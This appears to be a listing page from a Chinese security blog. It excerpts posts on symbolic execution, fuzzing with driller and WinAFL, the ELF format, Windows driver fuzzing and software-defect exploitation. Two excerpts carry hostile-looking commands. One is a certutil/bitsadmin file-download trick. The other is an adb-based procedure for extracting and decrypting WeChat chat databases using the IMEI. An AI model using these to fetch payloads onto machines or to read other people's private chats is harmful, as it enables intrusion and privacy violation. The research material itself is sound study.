地狱怪客

如何学习符号执行(Symbolic Execution)

来源:https://www.zhihu.com/question/38727250 ls的答主说得很好,我补充几个项目DART(PLDI 05), EXE(CCS 06), Sketch(ASPLOS 06), SAGE(NDSS 08)。另外有个“微型”项目 GitHub – xiw/mini-mc(作者是谁就不用介绍了..) 两点建议: 从特定应用需求(如果有的话)出发:test […]

小试shellphish开源的driller

文章来源:http://mp.weixin.qq.com/s?__biz=MzIzMTAzODMzNQ%3D%3D&idx=1&mid=2650800366&sn=1dd2444674773199a2547f1092a8668f 2016-09-19 山地子 由于CGC的启发,最近稍微研究了一下用符号执行来辅助Fuzzing,具体能不能在常用的软件中使用还需要验证,目前只是 […]

ELF文件格式分析

这个文章写的很棒棒,转过来。写了个ELF结构分析程序,帮助很大。 原文地址:https://segmentfault.com/a/1190000007103522?utm_source=tuicool&utm_medium=referral 0x00 简介 可执行链接格式(Executable and Linking Format)最初是由 UNIX 系统实验室(UNIX System L […]

Google自定义搜索引擎

文章来源:http://www.cnblogs.com/mingjiatang/p/6048193.html   本文主要介绍如何通过Google的API来定义自己的搜索引擎,并将Google搜索框嵌入到自己的web页面。另外,分析了自定义搜索引擎请求数据的url,模拟请求并获取搜索的结果。 1 写在前面 前段时间发现了一个网站提供搜索百度网盘资源,挺好用的,但是广告很多,于是自己做了一 […]

windows下载姿势

certutil -urlcache -split -f  http://www.baidu.com/1.rar bitsadmin /transfer n http://download.sysinternals.com/files/PSTools.zip  C:\test\update\PSTools.zip

初识 Fuzzing 工具 WinAFL

文章出处:http://paper.seebug.org/323/ 作者:xd0ol1(知道创宇404实验室) 0 引子 本文前两节将简要讨论 fuzzing 的基本理念以及 WinAFL 中所用到的插桩框架 DynamoRIO ,而后我们从源码和工具使用角度带你了解这个适用于 Windows 平台的 fuzzing 利器。 1 Fuzzing 101 就 fuzzing 而言,它是一种将无效、未 […]

android微信聊天记录解密

cd /data/data/com.tencent.mm/MicroMsg/81b4065cbd0c3672469fc95f9cb23aaa cp EnMicroMsg.db …  & chmod 777  EnMicroMsg.db & adb pull … 拨*#06# 获取IMEI = 356489053711441 cd /data/data/com […]

驱动漏洞挖掘2-了解驱动结构体fuzz笔记

///////////////////////////////////////// 2017/07/13 学习书籍:《Windows内核安全与驱动开发》 目的:看IDA如看源码,知道Fuzz目标与参数控制 // // Define the major function codes for IRPs. // #define IRP_MJ_CREATE 0x00 #define IRP_MJ_CREA […]

几种软件缺陷的可能利用方法

几种软件缺陷的可能利用方法 作者:吴石 我的题目是几种不常见的软件缺陷,但是内容可能有一些出入。第二,我也是一个初学者,PPT里可能也存在很多问题,也希望各位专家指出来。 我们先看看常见的软件缺陷: 第一,栈溢出。就是在栈中申请一段内存,一般是数组或字符串,在对这段内存做操作的时候,错误的写操作可能导致栈中也特殊意义的地址被用户的输入内容所控制。最早发现是一些字符串操作的函数中,比如strcat, […]

吴石 – 寻找网络漏洞的人

自由人”吴石   在2010年6月的一次安全更新中,苹果公司针对iPhone操作系统发布了64个新补丁,在这之中,有15个漏洞都是由吴石发现的,而由苹果内部研究人员发现的漏洞只有6个。美国《福布斯》杂志在一篇文章中写道:“自2007年以来,这位家住上海的35岁研究员已经发现并报告了IE、Safari和Chrome等浏览器中存在的100多个严重漏洞……这表明吴石一年汇报给ZDI和iDefense的漏 […]